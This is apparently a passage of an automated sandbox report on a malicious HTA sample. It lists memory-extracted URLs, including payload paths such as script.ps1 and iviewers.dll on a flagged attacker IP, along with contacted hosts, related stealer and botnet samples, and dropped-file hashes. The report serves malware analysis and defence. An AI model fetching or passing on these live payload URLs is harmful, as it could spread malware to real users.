                                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaio12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://aka.ms/pscore6lBkqpowershell.exe, 00000005.00000002.1773560054.0000000004541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1797529173.0000000004611000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A0A9000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A07F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://147.45.47.15/script.ps11gUcurl.exe, 00000004.00000002.1738755036.0000000002C50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.ecosia.org/newtab/io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brio12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F15926F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ac.ecosia.org/autocomplete?q=io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.micropowershell.exe, 00000007.00000002.1812229700.0000000007FA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgio12j1es.2tm.exe, 0000000C.00000003.1923710283.000001F15754F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://147.45.47.15/iviewers.dllXRpowershell.exe, 00000005.00000002.1773560054.0000000004694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.1797529173.0000000004766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://147.45.47.15powershell.exe, 00000005.00000002.1773560054.0000000004694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1773560054.00000000047D0000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://support.mozilla.orgio12j1es.2tm.exe, 0000000C.00000003.1906772053.000001F159B22000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1921895936.000001F15A114000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1922082521.000001F15A030000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F159268000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1906316117.000001F159260000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1921895936.000001F15A11C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesio12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A00E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A01F000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A038000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1900063983.000001F159FA9000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899926649.000001F157550000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A084000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1899100426.000001F15A003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://ns.microsoft.t/Regiio12j1es.2tm.exe, 0000000C.00000003.2108934415.000001F159CD0000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1894770651.000001F159CC1000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.2109042169.000001F159CD4000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.2108962470.000001F159CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=io12j1es.2tm.exe, 0000000C.00000003.1898442562.000001F15A02E000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1898724678.000001F159FA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://147.45.4zYpowershell.exe, 00000005.00000002.1773560054.00000000047D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              104.26.12.205
                                                                                              api.ipify.orgUnited States
                                                                                              13335CLOUDFLARENETUSfalse
                                                                                              147.45.47.15
                                                                                              unknownRussian Federation
                                                                                              2895FREE-NET-ASFREEnetEUtrue
                                                                                              193.3.19.151
                                                                                              unknownDenmark
                                                                                              2107ARNES-NETAcademicandResearchNetworkofSloveniaSItrue
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1578050
                                                                                              Start date and time:2024-12-19 08:10:40 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 6m 53s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:17
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:script.hta
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winHTA@19/14@1/3
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 60%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 98%
                                                                                              • Number of executed functions: 227
                                                                                              • Number of non-executed functions: 154
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .hta
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 92.122.16.236, 20.109.210.53, 13.107.246.63
                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target mshta.exe, PID 6344 because there are no executed function
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 3736 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              TimeTypeDescription
                                                                                              02:11:38API Interceptor79x Sleep call for process: powershell.exe modified
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              104.26.12.205jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/?format=text
                                                                                              xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                                                              • api.ipify.org/
                                                                                              GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                              • api.ipify.org/
                                                                                              8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                                              • api.ipify.org/
                                                                                              Simple2.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                              • api.ipify.org/
                                                                                              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                              • api.ipify.org/
                                                                                              perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                              • api.ipify.org/
                                                                                              SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                              • api.ipify.org/
                                                                                              193.3.19.151duschno.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                1Sj5F6P4nv.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                  5LEXIucyEP.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    44qLDKzsfO.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                      gP5rh6fa0S.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                        urkOkB0BdX.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          8F0oMWUhg7.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            api.ipify.orgWdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                            • 104.26.12.205
                                                                                                            cali.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 104.26.13.205
                                                                                                            Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                            • 104.26.13.205
                                                                                                            PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                            • 104.26.12.205
                                                                                                            Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 172.67.74.152
                                                                                                            winws1.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.12.205
                                                                                                            KASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 172.67.74.152
                                                                                                            PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                            • 104.26.13.205
                                                                                                            rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 172.67.74.152
                                                                                                            https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 172.67.74.152
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            ARNES-NETAcademicandResearchNetworkofSloveniaSIhttps://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 193.3.184.24
                                                                                                            bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 95.87.151.57
                                                                                                            duschno.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 193.3.19.151
                                                                                                            jade.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 95.87.151.72
                                                                                                            https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3DGet hashmaliciousPhisherBrowse
                                                                                                            • 193.3.19.55
                                                                                                            https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                                                                                                            • 193.3.184.46
                                                                                                            la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 95.87.175.59
                                                                                                            file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 193.3.168.50
                                                                                                            file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 193.3.168.50
                                                                                                            file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 193.3.168.50
                                                                                                            CLOUDFLARENETUSc2A6GRyAwn.dllGet hashmaliciousNitolBrowse
                                                                                                            • 104.21.42.47
                                                                                                            AWrVzd6XpC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 172.67.209.202
                                                                                                            Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 104.21.86.72
                                                                                                            469oyXQbRY.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.179.109
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                                                            • 104.21.64.80
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                            • 104.21.67.146
                                                                                                            1.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 141.101.96.239
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                            • 104.21.12.88
                                                                                                            https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.26.92
                                                                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                                                            • 104.16.123.96
                                                                                                            FREE-NET-ASFREEnetEUR4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 147.45.49.155
                                                                                                            R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 147.45.49.155
                                                                                                            s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 147.45.49.155
                                                                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 147.45.124.54
                                                                                                            boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 147.45.124.54
                                                                                                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 147.45.124.54
                                                                                                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 147.45.124.54
                                                                                                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 147.45.124.54
                                                                                                            boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 147.45.124.54
                                                                                                            boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 147.45.124.54
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            37f463bf4616ecd445d4a1937da06e19Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 104.26.12.205
                                                                                                            TT copy.jsGet hashmaliciousFormBookBrowse
                                                                                                            • 104.26.12.205
                                                                                                            TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.26.12.205
                                                                                                            QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                            • 104.26.12.205
                                                                                                            R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.12.205
                                                                                                            R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.12.205
                                                                                                            s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.12.205
                                                                                                            sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.26.12.205
                                                                                                            solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.26.12.205
                                                                                                            List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                            • 104.26.12.205
                                                                                                            No context
                                                                                                            Process:C:\Windows\Temp\Launcher.exe
                                                                                                            File Type:CSV text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):226
                                                                                                            Entropy (8bit):5.360398796477698
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                            MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                            SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                            SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                            SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1300
                                                                                                            Entropy (8bit):5.364346229059876
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:3bWSKco4KmZjKbmOIld6emZ9tYs4RPQoUEJ0gt/NK3R8QHiag+:rWSU4xym/jmZ9tz4RIoUl8NWR8QHb
                                                                                                            MD5:7AF13FDCE1FB2861C38B6E865BA229B6
                                                                                                            SHA1:B3C7EED69B996A1A1DA09F13FCF812B35F45454E
                                                                                                            SHA-256:DD97113E170CB01A86EF21ADA58C84F7A2BFCF80196C37C4FA8B7B0E445343FD
                                                                                                            SHA-512:EBD0D6D1EFF994DFCDE23A78DC4ED266BE41176076E6274C99CBFFB6436B0DB1D0958A083D40992B3EF42706237EB58989ACE435C5172A1315916BFB8B4F0B37
                                                                                                            Malicious:false
                                                                                                            Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlllulph:NllUp
                                                                                                            MD5:0F51EE116E240BB197D007F53F068EE4
                                                                                                            SHA1:6ED7D8362638DF8B76A52EF04CD396E121ECF59A
                                                                                                            SHA-256:B98A5F234306BB2BE65A0BD4002EAC34B97AA0F68269617984D02FE75AF1F7C3
                                                                                                            SHA-512:381757906D60870E7498182EC173C084643BF6D164C5AC96002573E93C927B76D43AE992942C29C05475BC27DFA6EB704360CE081B77CE5DF772248833CAE566
                                                                                                            Malicious:false
                                                                                                            Preview:@...e.................................*..............@..........
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
